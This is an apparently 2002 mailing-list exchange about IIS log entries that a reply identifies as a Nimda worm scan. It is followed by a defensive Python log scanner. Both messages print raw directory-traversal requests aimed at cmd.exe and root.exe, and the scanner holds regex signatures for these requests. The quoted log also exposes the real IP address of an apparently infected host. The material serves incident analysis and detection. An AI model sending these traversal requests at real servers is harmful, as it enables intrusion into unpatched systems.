Hello Jim, these traces look like a worm called Nimda which appeared last year.
Here is a sample trace:

2001-09-19 00:00:00 x.x.x.x y.y.y.y GET /scripts/root.exe 404 820 72 80 HTTP/1.0 - -
2001-09-19 00:00:00 x.x.x.x y.y.y.y GET /MSADC/root.exe 404 820 70 80 HTTP/1.0 - -
2001-09-19 00:00:00 x.x.x.x y.y.y.y GET /c/winnt/system32/cmd.exe 404 820 80 80 HTTP/1.0 - -
2001-09-19 00:00:00 x.x.x.x y.y.y.y GET /d/winnt/system32/cmd.exe 404 820 80 80 HTTP/1.0 - -
2001-09-19 00:00:00 x.x.x.x y.y.y.y GET /scripts/..%5c../winnt/system32/cmd.exe 404 820 96 80 HTTP/1.0 - -
2001-09-19 00:00:00 x.x.x.x y.y.y.y GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 404 820 117 80 HTTP/1.0 - -
2001-09-19 00:00:00 x.x.x.x y.y.y.y GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 404 820 117 80 HTTP/1.0 - -
2001-09-19 00:00:00 x.x.x.x y.y.y.y GET /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe 404 820 145 80 HTTP/1.0 - -
2001-09-19 00:00:00 x.x.x.x y.y.y.y GET /scripts/..Á../winnt/system32/cmd.exe 404 820 97 80 HTTP/1.0 - -
2001-09-19 00:00:00 x.x.x.x y.y.y.y GET /scripts/winnt/system32/cmd.exe 404 820 97 80 HTTP/1.0 - -
2001-09-19 00:00:00 x.x.x.x y.y.y.y GET /winnt/system32/cmd.exe 404 820 97 80 HTTP/1.0 - -
2001-09-19 00:00:00 x.x.x.x y.y.y.y GET /winnt/system32/cmd.exe 404 820 97 80 HTTP/1.0 - -
2001-09-19 00:00:00 x.x.x.x y.y.y.y GET /scripts/..%5c../winnt/system32/cmd.exe 404 820 98 80 HTTP/1.0 - -
2001-09-19 00:00:00 x.x.x.x y.y.y.y GET /scripts/..%5c../winnt/system32/cmd.exe 404 820 96 80 HTTP/1.0 - -
2001-09-19 00:00:00 x.x.x.x y.y.y.y GET /scripts/..%5c../winnt/system32/cmd.exe 404 820 100 80 HTTP/1.0 - -
2001-09-19 00:00:00 x.x.x.x y.y.y.y GET /scripts/..%2f../winnt/system32/cmd.exe 404 820 96 80 HTTP/1.0 - -

This is the whole trace of a Nimda scan. The worm tried to find a backdoor placed earlier by another worm, called Code Red II or III I think. One final remark! Never post a trace like yours on an open list with original IP addresses in it, even if it's not yours!!!!

In this case, if it's Nimda, this machine is infected, and probably still has the vulnerability and backdoor on it. Better inform the owner of the machine and do not post the IP address.

Holger Reichert
www.holysword.de
[EMAIL PROTECTED]

-----Original Message-----
From: Jim Grossl [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, 15 January 2002 17:24
To: [EMAIL PROTECTED]
Subject: IIS log files, can I have your take on these attacks?

207.225.190.149 -- [14/Jan/2002:10:30:22 -0700] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 3396
207.225.190.149 -- [14/Jan/2002:10:30:22 -0700] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 3396
207.225.190.149 -- [14/Jan/2002:10:30:22 -0700] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3396
207.225.190.149 -- [14/Jan/2002:10:30:22 -0700] "GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3396
207.225.190.149 -- [14/Jan/2002:10:30:23 -0700] "GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 3837
207.225.190.149 - - [14/Jan/2002:10:30:25 -0700] "GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3396

It kind of bothers me to post these on an open list (apparently our Web server doesn't need any more "attention") but I would like to know what everyone thinks of these attacks. My Web server logged > 2000 of these attacks over the weekend. I'm pretty sure that the attacks are not succeeding, but I've read that if the "%5c" shows up in the Double Decode attack that the file traversal is taking place. Thanks.

Jim Grossl
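As an added, defender-side example (not code posted by either Holger or Jim), here is a Python script that parses log lines in the NCSA format Jim quoted, flags the request paths the trace above shows (root.exe, cmd.exe, ..%5c and ..%2f traversal), and groups hits by source address while separating requests the server refused from any it actually served, which is the check that tells whether a %5c request did more than get logged. The sample lines and the 192.0.2.x addresses are constructed placeholders, and the signature list is assembled from this thread, not taken from any IDS rule set.

```python
import re
from collections import defaultdict

# NCSA common log format, as in the IIS excerpt quoted in the thread.
CLF = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\S+)')

# Request-path signatures taken from the scan pattern in the thread
# (constructed for this example, not a vendor rule set).
SIGNATURES = {
    "root.exe backdoor probe": re.compile(r"/root\.exe", re.I),
    "cmd.exe request": re.compile(r"/cmd\.exe", re.I),
    "encoded backslash traversal (%5c)": re.compile(r"\.\.%5c", re.I),
    "encoded slash traversal (%2f)": re.compile(r"\.\.%2f", re.I),
}

def parse_clf(line):
    """Return (ip, method, path, status) for one log line, or None."""
    m = CLF.match(line)
    if not m:
        return None
    ip, _ts, method, path, status, _size = m.groups()
    return ip, method, path, int(status)

def classify(path):
    """Names of the signatures the request path matches."""
    return [name for name, rx in SIGNATURES.items() if rx.search(path)]

def scan(lines):
    """Group hits by source IP. 'blocked' counts probes the server refused
    (404/401 etc.); 'served' counts 2xx answers, i.e. the traversal reached
    something rather than merely being attempted."""
    report = defaultdict(lambda: {"blocked": 0, "served": 0, "sigs": set()})
    for line in lines:
        parsed = parse_clf(line)
        if not parsed:
            continue
        ip, _method, path, status = parsed
        sigs = classify(path)
        if not sigs:
            continue
        report[ip]["served" if 200 <= status < 300 else "blocked"] += 1
        report[ip]["sigs"].update(sigs)
    return dict(report)

# Constructed sample lines modelled on the thread (placeholder addresses).
SAMPLE = [
    '192.0.2.10 - - [14/Jan/2002:10:30:22 -0700] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 3396',
    '192.0.2.10 - - [14/Jan/2002:10:30:22 -0700] "GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3396',
    '192.0.2.10 - - [14/Jan/2002:10:30:23 -0700] "GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 3837',
    '192.0.2.10 - - [14/Jan/2002:10:30:25 -0700] "GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3396',
    '192.0.2.77 - - [14/Jan/2002:10:31:00 -0700] "GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 1201',
    '192.0.2.10 - - [14/Jan/2002:10:31:05 -0700] "GET /index.html HTTP/1.0" 200 512',
]

if __name__ == "__main__":
    for ip, r in scan(SAMPLE).items():
        print(ip, r["blocked"], "blocked,", r["served"], "served;", sorted(r["sigs"]))
```

A source address with only "blocked" hits is a scanning (and, per Holger, most likely infected) host to report to its owner; a "served" hit on a cmd.exe path is the case that warrants treating the web server itself as compromised.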